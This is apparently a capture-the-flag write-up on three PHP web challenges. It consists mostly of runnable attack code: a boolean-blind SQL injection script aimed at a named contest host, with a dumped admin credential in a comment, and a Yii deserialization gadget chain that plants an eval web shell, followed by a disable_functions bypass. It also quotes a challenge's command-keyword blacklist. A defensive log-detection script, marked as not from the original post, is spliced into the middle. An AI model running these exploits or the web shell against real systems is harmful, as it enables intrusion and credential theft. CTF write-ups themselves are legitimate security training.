robots.txt
When I was a child,I also like to read Robots.txt
Here is what you want:1ndexx.php
.1ndexx.php.swp
```php
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
    background-color: white;
    text-align: center;
    padding: 50px;
    font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}
#logo {
    margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
```
And this damn thing turns out to be the source of index.php...
payload
The intended solution should be a function along the lines of show_source. I did think of it during the contest, but show_source(__FILE__) gave nothing, so I switched to phpinfo instead; I didn't expect that concatenating the string would directly highlight flag.php.
image.php has an injection
exp
```python
import requests as req
import time

target = "http://eci-2zeir5o8p6vh7tzmqpxt.cloudeci1.ichunqiu.com/image.php?id="
flag = ''
session = req.Session()
# Boolean-based blind injection: binary-search each character's ASCII value.
for j in range(1, 250):
    hi = 126
    lo = 32
    length = len(flag.strip())
    while 1:
        mid = (hi + lo) // 2
        # sql = "select database()" # ctf
        # sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" # images,users
        # sql = "select group_concat(column_name) from information_schema.columns where table_name='users'" # username,password
        sql = "select group_concat(username,':',password) from users " # admin:b87889146155b52d7d94e
        # Spaces are replaced by inline comments to get past the filter.
        SQL = f"5 OR ASCII(substr(({sql}),{j},1))>{mid}#".replace(" ", "/**/")
        res = session.get(url=target+SQL)
        time.sleep(0.5)
        print(SQL)
        if len(res.text) > 0:
            # Non-empty response: condition true, character is above mid.
            if hi - 1 == lo:
                flag += chr(hi)
                print(flag)
                break
            lo = mid
        else:
            # Empty response: condition false, character is mid or below.
            if hi - 1 == lo:
                flag += chr(lo)
                print(flag)
                break
            hi = mid
    # No new non-space character extracted: end of the result string.
    if length == len(flag.strip()):
        print(flag)
        break
```
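As an added defensive example (not code from the original post), the following Python checks web-server access-log lines for the boolean-blind probe shape used by the script above: it URL-decodes the request, collapses the `/**/` comments that stand in for spaces, flags `OR ASCII(substr(...` conditions, and counts probes per client IP, since character-by-character extraction produces long runs of near-identical requests. The log lines and IPs are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:12:00:00 +0000] "GET /image.php?id=5/**/OR/**/ASCII(substr((select/**/group_concat(username,':',password)/**/from/**/users),1,1))>79%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2021:12:00:01 +0000] "GET /image.php?id=5/**/OR/**/ASCII(substr((select/**/group_concat(username,':',password)/**/from/**/users),1,1))>102%23 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2021:12:00:02 +0000] "GET /image.php?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:12:00:03 +0000] "GET /image.php?id=5%20OR%20ASCII(substr((select%20database()),1,1))>77%23 HTTP/1.1" 200 512
"""

# Common/combined log format: client IP, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)'
)
# Boolean-blind probe: an OR clause comparing ASCII(substr(...)) to a number.
BLIND_RE = re.compile(r'\bor\b.*\bascii\s*\(\s*substr\s*\(', re.IGNORECASE)


def normalize(path):
    """URL-decode the path and turn inline comments (/**/) back into spaces."""
    decoded = unquote_plus(path)
    return re.sub(r'/\*.*?\*/', ' ', decoded)


def detect(log_text):
    """Return (ip, normalized_path) for every request matching the probe shape."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        norm = normalize(m.group('path'))
        if BLIND_RE.search(norm):
            hits.append((m.group('ip'), norm))
    return hits


def probes_per_ip(log_text):
    """Count flagged requests per client; a high count signals extraction."""
    return Counter(ip for ip, _ in detect(log_text))
```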
After logging in, the flag can be read directly via the file protocol.
www.zip
Source code leak. This is clearly the Yii framework, so the point of the challenge should be gadget chain discovery. From the debug information, the PHP version is 5.6 and the framework version is 2.0.32.
Following the article https://www.anquanke.com/post/id/217929, I just ran the exploit straight through.
```php
<?php
namespace yii\rest{
    class IndexAction {
        public $checkAccess;
        public $id;
        public function __construct()
        {
            $this->checkAccess="assert";
            $this->id="die(file_put_contents('/var/www/html/web/t.php', '<?php eval(\$_POST[cmd])?>'))";
        }
    }
}
namespace Faker{
    use yii\rest\IndexAction;
    class Generator{
        protected $formatters = array();
        public function __construct()
        {
            $this->formatters['close']=[new IndexAction,"run"];
        }
    }
}
namespace yii\db {
    use Faker\Generator;
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace {
    echo base64_encode(serialize(new yii\db\BatchQueryResult()));
}
```
Then connect with AntSword and use the bypass disable_function plugin to execute /readflag, which gives the flag.
Leaving a link here to reproduce later: LightCMS all-versions backend RCE 0day analysis